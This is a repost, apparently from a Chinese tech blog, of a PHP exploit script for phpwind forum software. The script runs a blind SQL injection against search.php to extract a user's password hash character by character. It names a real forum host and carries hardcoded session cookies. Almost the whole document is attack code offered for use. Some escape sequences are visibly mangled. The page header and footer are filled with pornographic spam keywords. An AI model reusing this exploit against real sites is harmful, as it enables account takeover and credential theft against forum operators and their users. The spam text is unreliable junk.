中文字幕日韩一区二区_国产一区二区av_国产毛片av_久久久久国产一区_色婷婷电影_国产一区二区精品

從網上搜到的phpwind 0day的代碼

2014-10-22 02:54:56 分類:php技術 閱讀()

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 劍心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All phpwind Version</center>
<center> BY 劍心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidNET.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; phpSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';


$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='沒有查找匹配的內容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php//(.+)/r/n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;


$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 錄"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');


for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID/r/n");


}
fclose($log);
echo "<br>Done!We Post $count times!<br>";


function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1/r/n";
$message .= "Accept: */*/r/n";
$message .= "Accept-Language: zh-cn/r/n";
$message .= "Referer: http://".$server.$path."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "Content-length: ".strlen($cmd)."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= "/r/n";
$message .= $cmd."/r/n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

php技術從網上搜到的phpwind 0day的代碼,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

標簽:
主站蜘蛛池模板: 99精品99| 久久久久久亚洲 | 日韩视频成人 | 欧美精品成人一区二区三区四区 | 国产精品伦理一区 | 中文字幕在线第一页 | 国产精品美女久久久 | 黄色a视频 | 欧美亚洲国产精品 | 性xxxxx | 久久久久久久综合色一本 | 久草欧美 | 成av人电影在线 | 一区二区三区四区日韩 | 午夜视频免费网站 | 国产精品一区二区不卡 | a免费视频 | 91精品国产综合久久久久久漫画 | 日本精品一区二区三区在线观看视频 | 欧美精品一区二区免费 | 99一级毛片| 久久99精品国产 | 日本a级大片 | 99久久99久久精品国产片果冰 | 91精品国产综合久久婷婷香蕉 | 夜夜夜操| 国产精品永久免费 | 国产精品不卡一区二区三区 | 亚洲精品电影网在线观看 | 91精品国产综合久久久动漫日韩 | 91视频进入 | 91视频精选| 日韩午夜| 国产精品久久久久久久久久免费看 | 18性欧美 | 一区二区三区四区视频 | 免费观看黄网站 | 色综合一区二区 | 精品乱码一区二区 | www.99re | 欧美成视频 |